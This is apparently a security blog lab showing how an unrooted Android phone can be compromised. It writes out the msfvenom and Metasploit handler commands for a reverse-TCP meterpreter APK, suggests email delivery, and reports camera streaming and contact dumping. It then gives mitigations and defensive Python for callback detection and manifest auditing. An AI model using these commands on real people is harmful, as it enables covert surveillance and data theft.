We have all been told that a rooted Android phone is vulnerable. That raises a further question: “If an Android phone is not rooted and still in out-of-the-box condition, is it safe then?”
At the end of this post I'm going to make a short story long and show you the answer to that question. If you are just looking for the short version of the answer, it is “NO, it's still not safe.”
If you want to follow this step-by-step lab, you will need: 1. Kali Linux, 2. an Android phone, 3. an internet connection.
Step 1. Run “Terminal” in Kali and type
“msfvenom -p android/meterpreter/reverse_tcp LHOST=your_Kali_IP LPORT=4444 R > ~/Desktop/themitigators.apk”
‘your_Kali_IP’ is the IP address of your Kali Linux machine. If you don't know your IP address, ‘ifconfig’ will tell you.
The file name ‘themitigators.apk’ can be anything you like.
If the command executes successfully, the .apk file (in this case ‘themitigators.apk’) will be placed on the desktop.
Step 2. Now launch Metasploit by typing “msfconsole”.
If you see the following screen, you are ready for Step 3.
Step 3. In the same terminal window, execute the following commands:
3.1 use exploit/multi/handler
3.2 set payload android/meterpreter/reverse_tcp
3.3 set lhost your_Kali_IP
3.4 set lport 4444
Now the reverse TCP handler waits for the victim to download and launch the payload ‘themitigators.apk’.
Step 4. Deliver the payload to the target, let's say through email.
Step 5. Now the victim receives and opens the .apk (hopefully..).
Step 6. Once the victim has installed and launched the .apk, the attacker will have an established connection.
Now let's see what we can do to this poor victim. First, type ‘help’ to see the list of things we can do while this session is alive.
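The connection established in Step 6 is the part a defender can see from the network side: the phone opens an outbound TCP session to the handler's LHOST/LPORT (4444 in this lab) and holds it open for as long as the meterpreter session lives. The following is an added example, not code from the original post, that runs a simple callback detector over a few constructed flow-log lines. The log format, the phone subnet 10.0.10.0/24, the allowlist of expected ports and the 300-second threshold are all assumptions made for the example; the remote addresses are documentation ranges, not real hosts.

```python
"""Added example: flag outbound phone connections that look like a reverse-TCP
callback.  The flow-log format below is constructed for this example:
  timestamp src_ip src_port dst_ip dst_port proto bytes_out duration_s
"""
from dataclasses import dataclass
from ipaddress import ip_address, ip_network

PHONE_SUBNET = ip_network("10.0.10.0/24")          # assumed: where mobile devices live
INTERNAL_NETS = [ip_network("10.0.0.0/8"),          # RFC 1918 ranges: traffic that stays
                 ip_network("172.16.0.0/12"),       # inside the network is not a callback
                 ip_network("192.168.0.0/16")]
EXPECTED_PORTS = {53, 80, 443, 993, 5228}           # assumed allowlist: DNS, web, IMAPS, push
LONG_SESSION_S = 300                                # assumed: sessions longer than this stand out
HANDLER_PORT = 4444                                 # the LPORT used in this lab

# Constructed sample flows: 10.0.10.23 makes normal web/push traffic, then holds a
# long session to 203.0.113.7:4444 and reconnects to it once more.
SAMPLE_FLOWS = """\
2024-05-01T10:00:01 10.0.10.23 41022 198.51.100.20 443 tcp 1200 4
2024-05-01T10:00:05 10.0.10.23 41023 198.51.100.21 5228 tcp 300 3600
2024-05-01T10:01:10 10.0.10.23 41030 203.0.113.7 4444 tcp 85000 1800
2024-05-01T10:01:11 10.0.10.23 41031 203.0.113.7 4444 tcp 200 2
2024-05-01T10:02:00 10.0.10.44 52001 198.51.100.9 8080 tcp 500 20
"""


@dataclass
class Flow:
    ts: str
    src: str
    sport: int
    dst: str
    dport: int
    proto: str
    bytes_out: int
    duration_s: int


def parse_flows(text):
    """Parse one flow per line; malformed lines are skipped rather than crashing."""
    flows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 8:
            continue
        ts, src, sport, dst, dport, proto, b, d = parts
        flows.append(Flow(ts, src, int(sport), dst, int(dport), proto, int(b), int(d)))
    return flows


def suspicious_reasons(flow):
    """Return the reasons a flow looks like a handler callback (empty if it does not)."""
    src, dst = ip_address(flow.src), ip_address(flow.dst)
    if src not in PHONE_SUBNET or any(dst in net for net in INTERNAL_NETS):
        return []
    if flow.dport in EXPECTED_PORTS:
        return []
    reasons = []
    if flow.dport == HANDLER_PORT:
        reasons.append("destination port 4444 is Metasploit's default handler port")
    if flow.duration_s >= LONG_SESSION_S:
        reasons.append(f"session held open {flow.duration_s}s on a non-standard port")
    return reasons


def find_callbacks(text):
    """Run the detector over a flow log and return one alert per suspicious flow."""
    alerts = []
    for f in parse_flows(text):
        reasons = suspicious_reasons(f)
        if reasons:
            alerts.append({"phone": f.src, "remote": f"{f.dst}:{f.dport}", "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in find_callbacks(SAMPLE_FLOWS):
        print(alert["phone"], "->", alert["remote"], "|", "; ".join(alert["reasons"]))
```

The short-lived second flow to the same endpoint is the kind of reconnect a dropped session produces, so repeated alerts for one phone/remote pair are worth grouping in a real deployment. A port-based rule is only a first filter: an attacker can pick any LPORT, which is why the long-session check is there as well.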
I'm already seeing some interesting keywords like webcam_stream, dump_contacts, wlan_geolocate and more.
Here are the results of each command I tried.
Streaming from the rear camera was successful. Although the phone's screen was locked and the camera app wasn't running, I was able to see whatever the rear camera sees. However, depending on how busy your network is, the video might take 15~30 seconds to come up or simply lag a lot.
Dumping the contact list from the victim's phone was successful. The dumped contact list is automatically saved under the home folder.
And the contact dump is displayed in a well-organized format.
Like every other form of reverse_tcp attack, the victim is the key. If the user doesn't download and run the .apk, the user will be safe. But, well, that's not the case in real life. And obviously, this lab worked on an Android phone that has never been rooted. So “do not root your phone” is not the answer either.
One thing that can easily be done to mitigate this type of attack is disabling “Unknown Sources” in the Settings/Security menu.
Since ‘themitigators.apk’ was generated by msfvenom and was not downloaded from the Play Store, disabling “Unknown Sources” makes the phone refuse to install the .apk, so it never gets to run.
If you have anti-malware protection on your phone, it would detect the apk file and shut down the connection to the attacker, even if the victim manually gives it the go-ahead.
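The two mitigations above come down to one question: should this sideloaded app, with the access it asks for, be installed at all? Everything the session did in this post (camera, contacts, Wi-Fi geolocation) maps to an Android permission the app has to declare in its manifest. The following is an added example, not the post's or Metasploit's code, of a manifest audit an administrator or anti-malware check could apply before install. It assumes the manifest has already been decoded to plain XML (for a real APK that is what a tool such as aapt or apktool produces); the two manifests, the package names and the verdict rules are constructed for the example.

```python
"""Added example: audit a decoded AndroidManifest.xml for the permissions that
enable the kind of data collection shown in the post, and decide whether a
sideloaded app should be installed.  Both manifests below are constructed."""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
NAME_ATTR = f"{{{ANDROID_NS}}}name"

# Permissions that grant the access the post's meterpreter commands relied on,
# plus a few neighbours of the same kind.  Capability labels are descriptive.
PERMISSION_CAPABILITIES = {
    "android.permission.CAMERA": "camera streaming (webcam_stream)",
    "android.permission.READ_CONTACTS": "contact list export (dump_contacts)",
    "android.permission.ACCESS_FINE_LOCATION": "location from Wi-Fi scans (wlan_geolocate)",
    "android.permission.ACCESS_COARSE_LOCATION": "location from Wi-Fi scans (wlan_geolocate)",
    "android.permission.RECORD_AUDIO": "microphone capture",
    "android.permission.READ_SMS": "SMS export",
    "android.permission.READ_CALL_LOG": "call log export",
}

# Constructed: a sideloaded app asking for network access plus several
# collection permissions, and one that only talks to the network.
SIDELOADED_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.sideloaded">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.CAMERA"/>
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
  <uses-permission android:name="android.permission.RECORD_AUDIO"/>
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
  <application android:label="Mitigators">
    <activity android:name=".MainActivity"/>
  </application>
</manifest>
"""

BENIGN_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.newsreader">
  <uses-permission android:name="android.permission.INTERNET"/>
  <application android:label="News"/>
</manifest>
"""


def requested_permissions(manifest_xml):
    """Return every android:name declared in a <uses-permission> element."""
    root = ET.fromstring(manifest_xml)
    return [el.get(NAME_ATTR) for el in root.iter("uses-permission") if el.get(NAME_ATTR)]


def audit_manifest(manifest_xml, from_known_store=False):
    """Classify an app as allow / review / block from its permission set.

    The rule is deliberately simple: collection permissions combined with
    network access in an app that did not come from a trusted store is the
    exact combination this lab's payload needs, so it is blocked outright.
    """
    root = ET.fromstring(manifest_xml)
    perms = requested_permissions(manifest_xml)
    capabilities = {p: PERMISSION_CAPABILITIES[p] for p in perms if p in PERMISSION_CAPABILITIES}
    has_network = "android.permission.INTERNET" in perms
    starts_at_boot = "android.permission.RECEIVE_BOOT_COMPLETED" in perms

    findings = []
    if not from_known_store:
        findings.append("installed from an unknown source")
    if capabilities and has_network:
        findings.append("can collect personal data and send it off the device")
    if starts_at_boot:
        findings.append("restarts itself after reboot")

    if capabilities and has_network and not from_known_store:
        verdict = "block"
    elif capabilities:
        verdict = "review"
    else:
        verdict = "allow"
    return {"package": root.get("package"), "capabilities": capabilities,
            "findings": findings, "verdict": verdict}


if __name__ == "__main__":
    for xml in (SIDELOADED_MANIFEST, BENIGN_MANIFEST):
        result = audit_manifest(xml)
        print(result["package"], result["verdict"], result["findings"])
```

The same audit with from_known_store=True downgrades the sideloaded case from “block” to “review”, which is the policy difference the “Unknown Sources” switch enforces: apps from the store still get permission prompts, apps from anywhere else do not get installed.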